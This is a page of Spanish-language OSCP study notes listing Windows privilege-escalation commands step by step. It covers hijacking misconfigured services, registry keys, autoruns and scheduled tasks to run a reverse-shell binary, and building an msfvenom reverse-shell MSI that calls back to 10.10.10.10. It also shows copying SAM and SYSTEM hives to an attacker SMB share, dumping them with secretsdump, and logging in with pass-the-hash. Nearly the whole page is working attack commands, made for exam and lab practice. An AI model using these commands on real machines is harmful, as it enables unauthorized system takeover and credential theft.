OSCP Notes
  • OSCP Cheatsheet
  • Sistema de ficheros del OS
    • File Transfers Linux
    • File Transfers Windows
  • Web Attacks
    • Web Enumeration
    • SQL Injection
    • CGI
    • CMS
  • DATABASES
    • MSSQL
    • MYSQL
  • Services Enumeration
    • Trucos Generales
    • POP3 - 110
    • SMB - (445-139)
    • DNS
    • NFS - 2049
    • SMTP - 25
    • TFTP - 69
    • SNMP - (161-162-10161-10162)
  • Privilege Escalation
    • Information Gathering - EscPriv
    • Windows Privilege Escalation
      • MANUAL - Windows PrivEsc
      • Bypass UAC
    • Linux Privilege Escalation
  • Password Attacks
    • Hash Identification
    • Brute Force
    • Pass in the Hash
    • Password Cracking
  • Port Redirection and Tunneling
    • Port Forwarding
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Remote Port Forwarding
      • SSH Dynamic Port Forwarding
  • Active Directory Attacks
    • AD Enumeration
    • AD Authentication
    • AD Lateral Movement
    • AD Vulnerabilidades actuales
    • Powershell Empire
  • Buffer Overflow
    • Linux
    • Windows
      • Spiking
      • Fuzzing
      • Finding the Offset
      • Overwriting The EIP
      • Finding the Bad Charaters
      • Finding The Right Module
      • Generating Shellcode and Gaining Shell
  • Client-Side Attacks
    • Windows Office Macros
  • Post-explotacion
    • Trucos Generales
      • Links Utiles
    • Windows
      • Mimikatz
      • Writeup Esc WinXP SP1 with services
      • POWERSHELL
  • CRTP
    • PowerView
    • Notas Generales
Con tecnología de GitBook
En esta página
  • Service Exploits - Insecure Service Permissions
  • Service Exploits - Unquoted Service Path
  • Service Exploits - Weak Registry Permissions
  • Service Exploits - Insecure Service Executables
  • Registry - AutoRuns
  • Registry - AlwaysInstallElevated
  • Passwords - Registry
  • Passwords - Saved Creds
  • Passwords - Security Account Manager (SAM)
  • Pass In The HASH
  • Scheduled Tasks
  • Startup Apps
  1. Privilege Escalation
  2. Windows Privilege Escalation

MANUAL - Windows PrivEsc

Service Exploits - Insecure Service Permissions

accesschk.exe /accepteula -uwcqv user *
accesschk.exe /accepteula -uwcqv user daclsvc
sc qc daclsvc
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
net start daclsvc

La herramienta accesschk.exe con el prefijo uwcqv valida que servicio tiene permisos RW con el usuario actual.

Service Exploits - Unquoted Service Path

sc qc unquotedsvc
accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
net start unquotedsvc

BUILTIN\Users = Significa son todos los usuarios que el sistema operativo crea al instalar el sistema operativo, incluidas las cuentas locales (por ejemplo, invitado, ASP.NET o IUSR_hostname). También incluye todos los usuarios creados en el dominio.

Service Exploits - Weak Registry Permissions

sc qc regsvc
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
net start regsvc

NT AUTHORITY\INTERACTIVE = Significa todos los usuarios que han iniciado sesión.

Service Exploits - Insecure Service Executables

sc qc filepermsvc
accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
net start filepermsvc

Registry - AutoRuns

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
reboot

Registry - AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

El comando REQ QUERY debe responder algo asi: AlwaysInstallElevated REG_DWORD 0x1

Passwords - Registry

reg query HKLM /f password /t REG_SZ /s
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

Passwords - Saved Creds

cmdkey /list
runas /savecred /user:admin C:\PrivEsc\reverse.exe

Passwords - Security Account Manager (SAM)

copy C:\Windows\Repair\SAM \\10.10.10.10\kali\
copy C:\Windows\Repair\SYSTEM \\10.10.10.10\kali\
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

Pass In The HASH

pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //10.10.139.195 cmd.exe

Scheduled Tasks

C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

Startup Apps

C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
AnteriorWindows Privilege EscalationSiguienteBypass UAC

Última actualización hace 3 años